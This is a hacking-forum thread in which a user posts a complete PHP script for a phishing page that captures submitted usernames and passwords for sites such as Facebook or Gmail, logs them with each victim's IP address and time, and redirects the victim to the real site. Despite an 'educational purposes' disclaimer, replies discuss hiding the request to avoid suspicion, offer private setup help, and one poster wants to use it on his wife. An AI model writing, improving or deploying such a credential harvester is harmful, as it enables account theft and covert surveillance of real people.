Login Register




The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.


Phishing php script filter_list
Author
Message
Phishing php script #1
*Note: This is not a tutorial on how to use phishing to get emails and passwords. Only for educational purposes!!
Hi guys, i was gone for a while ,but, you know what people say..: Once a programmer, always a programmer Biggrin

Today I wanna help those who so desperately try to find (like I did when I started Biggrin ) the PHP script that recieves the POST method data(email/username and pass) from Facebook or Gmail(4example) and save them in a .txt file.

I remember that there is such script on the net but it is too simple... So this is my version of that PHP script with a few more features:

1. Recieves POST and GET method data and save them.
2. Also saves in the .txt file the server date and time so that you know when it was added.
3. Also gets and saves the victims IP adress for further usage.


PHP Code:
<?php /* #!#!#!#!#!#!#!#!#!#!#!#!#!#!#!#!#!#! Credits: ReTi0n 4 HackCommunity.COM Date : 8/9/13 #!#!#!#!#!#!#!#!#!#!#!#!#!#!#!#!#!#! */ //Location: The location where the user will be redirected after the script executes the commands. You can change it. header("Location: https://www.facebook.com/profile.php "); //It will create the file "logs1.txt" (if not already created) and will save the POST or GET method data(the username/email and pass). You can change the filename. $handle = fopen("logs1.txt", "a"); fwrite($handle, "\r\n"); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); //2ρος γυρος. //This filename must be the same with the one above. $myFile = "logs1.txt"; $fh = fopen($myFile, 'a'); //Gets remote ip adress $ip2 = $_SERVER['REMOTE_ADDR']; $ip = "IP=" . $_SERVER['REMOTE_ADDR'] . "\n" ; $stringData = "------------------------------------------\n"; $date = "Date=" . date('Y-m-d H:i:s'); //write in file fwrite($fh, $ip); fwrite($fh, "\r\n"); fwrite($fh, $date); fwrite($fh, "\r\n"); fwrite($fh, $stringData); fwrite($fh, "\r\n"); fwrite($fh, "\r\n"); fclose($fh); exit; /* #!#!#!#!#!#!#!#!#!#!#!#!#!#!#!#!#!#! Credits: ReTi0n 4 HackCommunity.COM Date : 8/9/13 #!#!#!#!#!#!#!#!#!#!#!#!#!#!#!#!#!#! */ ?>

This is an example of how its gonna look if you use it with multiple victims. IP is 127.0.0.1 'cause I used it in local network.
As you can see its pretty simple and everythink is organised.


[Image: example-Copy_zps48ac1af0.jpg]


PEACE:RETI0N


RE: Phishing php script #2
I think its better to use $_POST for sending these types of requests, be it a phishing page or a legitimate page.
If its a phishing page, using $_GET variables increases the suspicion, thats all.
[Image: 2YpkRjy.png]
PM me if you need help.
My pastebin HERE. My URL Shortener HERE.


RE: Phishing php script #3
Actually @The_Alchemist this is not a bad idea, i'll try it and if it hides the sending code then im gonna use it.
Smart thinking man Wink

@princenathan23
I could use a mysql database or sent to email like you said but in my opinion using a text file is just simplier...
What if you spread a lot? You are gonna be full of emails...


RE: Phishing php script #4
(09-09-2013, 09:03 PM)The Alchemist Wrote: I think its better to use $_POST for sending these types of requests, be it a phishing page or a legitimate page.
If its a phishing page, using $_GET variables increases the suspicion, thats all.

Just tried it and it is working. I also think that is loading a bit faster...but that doesnt really matter.
Thanks anyway.


RE: Phishing php script #5
How to use ? im having a difficulty :/


RE: Phishing php script #6
I thought asking for +rep is against rules.



RE: Phishing php script #7
(09-10-2013, 06:41 PM)Slarek Wrote: I thought asking for +rep is against rules.

Sorry ,didnt know that. I just remember others that used it... anyway, gonna fix it.

(09-10-2013, 06:29 PM)forky Wrote: How to use ? im having a difficulty :/

Im gonna help you via pm if you want.


RE: Phishing php script #8
(09-18-2013, 07:32 PM)pcwr Wrote: Greetings all..

Complete newbie etc etc..

Would be very grateful for correct set up assistance.. This is not my niche but I am trying to catch out a cheating wife etc..

Need all the help I can get.. Smile

All the best..

Instead of wasting your valuable time on a cheating wife...just throw it on the table! Be upfront. Talk it out and then from there, decide if you are going to work it out or not. Sex must be real good if your putting up with her cheating...haha
[username], can you please open the curtain a little bit? I can't see inside from the bushes :/ Thank you!


RE: Phishing php script #9
(01-17-2014, 04:38 PM)mikelmikel65 Wrote: ch3rn0byl are you talking to me mikelmikel65?

NO :d
its show the name of reader


RE: Phishing php script #10
(01-17-2014, 05:03 PM)SHADOW MAN Wrote:
(01-17-2014, 04:38 PM)mikelmikel65 Wrote: ch3rn0byl are you talking to me mikelmikel65?

NO :d
its show the name of reader

YESSS >8D
[username], can you please open the curtain a little bit? I can't see inside from the bushes :/ Thank you!